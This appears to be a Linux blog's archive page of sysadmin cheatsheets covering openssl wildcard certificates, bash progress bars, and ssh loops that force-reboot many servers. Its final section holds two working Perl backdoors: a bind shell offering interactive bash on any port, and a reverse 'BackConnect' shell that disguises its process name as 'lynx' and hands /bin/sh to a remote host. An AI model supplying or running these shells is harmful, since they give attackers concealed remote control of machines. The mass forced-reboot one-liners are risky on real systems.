Category Archives: linux

How to create a self-signed wildcard certificate. [cheatsheet]


openssl genrsa -out rootCA.key 2048
openssl req -x509 -new -nodes -sha1 -key rootCA.key -days 3650 -out rootCA.pem

openssl genrsa -out SITE.key 2048
openssl req -new -key SITE.key -out SITE.csr

Create a file named SITE.cnf, and put the following inside:

[req]
req_extensions = v3_req

[v3_req]
keyUsage = keyEncipherment, dataEncipherment
extendedKeyUsage = serverAuth
subjectAltName = @alt_names

[alt_names]
DNS.1 = domain.com
DNS.2 = *.domain.com

Finally:

openssl x509 -req -days 9999 -in SITE.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out SITE.crt -extfile SITE.cnf

Great tool to test the installed certificate:
gnutls-cli --x509cafile rootCA.pem -p [ssl_sevice_port] domain.com

simple progress bar in bash script

Example of a simple progress bar in bash script:

#!/bin/bash

PAGELOADS=30000;
PBAR_LEN=30;
PBAR_STEP=$[$PAGELOADS/$PBAR_LEN]

for i in `seq 1 $PAGELOADS`
do
fname="`date +%F-%T`.html"
time wget http://site/page -O $fname >> .log 2>>.log
cat $fname | grep NATURE > /dev/null && rm $fname
sleep 1

#simple progress bar for fun:
clear;
PBAR=$[$i/$PBAR_STEP]
echo -n "[";
for j in `seq 1 $PBAR_LEN`
do
if [ $j -gt $PBAR ]; then
echo -n ".";
else
echo -n "*";
fi
done
echo "] [$i/$PAGELOADS]";

done

[bash] ping a host until it responds

example:

# for i in `cat ~/mysql-list.txt`; do ssh -t root@${i} "hostname; date; echo \"FLUSH TABLES;\" | mysql; shutdown -fr now && date; sleep 40"; sleep 20; while true; do ping -c1 -W2 ${i} 2>&1 >/dev/null; if [[ "$?" == "0" ]]; then ping -c1 ${i}; break; fi; done; done

# for i in `seq -w 1 459`; do ssh root@srv0${i} "hostname; date; shutdown -fr now && date; sleep 40"; sleep 20; while true; do ping -c1 -W2 srv0${i} 2>&1 >/dev/null; if [[ "$?" == "0" ]]; then ping -c1 srv0${i}; break; fi; done; done

——

bash simple progress counter example
p=0; t=0; for USER in `ls /home/www`; do t=$(($t+1)); test "current_user" = "${USER}" && p=$t; done; echo $p "/" $t

perl bind port

#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

——
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "BackConnect";echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);